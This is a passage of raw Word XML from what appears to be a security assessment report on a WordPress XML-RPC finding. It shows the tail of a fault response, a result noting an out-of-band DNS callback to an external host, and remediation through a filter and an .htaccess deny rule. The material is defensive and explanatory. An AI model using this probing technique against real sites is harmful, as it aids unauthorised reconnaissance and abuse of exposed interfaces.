        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>member</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1709" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;faultString&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1709" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>member</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1313" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="917" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fault</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>methodResponse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="51"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487617536">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>196693</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="82" name="Graphic 82"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="82" name="Graphic 82"/>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5.487696pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15698944;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape67" coordorigin="1440,310" coordsize="2880,0" path="m1440,310l4320,310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2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>128</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="73"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId197">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://nitesculucian.github.io/2019/07/01/exploiting-the-xmlrpc-php-on-all-wordpress-versions/</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Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>connection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>made</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7as.es</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>address.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="367"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is advised to disable the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>XMLRPC </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>interface to avoid unnecessarily broadening the attack surface. This can be accomplished through freely available WordPress plugins such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>stop XML-RPC Attacks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>129</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Disable XML-RPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>130</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Alternatively, the following approaches are also possible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Proposed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Alternative</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Disable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>XMLRPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>add_filter(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'xmlrpc_enabled'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="53"/>
          <w:sz w:val="18"/>
          <w:u w:val="single" w:color="DD4E00"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return_false'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Proposed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Alternative</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Disable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>XMLRPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>.htacces</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="36"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Block WordPress xmlrpc.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="6912" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>xmlrpc.php&gt; order deny,allow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>deny from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>allow from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>xxx.xxx.xxx.xxx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;/Files&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Additional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="51"/>
          <w:w w:val="150"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mitigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="52"/>
          <w:w w:val="150"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>guidance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="69"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="68"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>background</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="68"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="68"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="68"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="68"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="68"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="69"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>kinsta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>131</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="68"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>hostinger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>132</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>guides</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
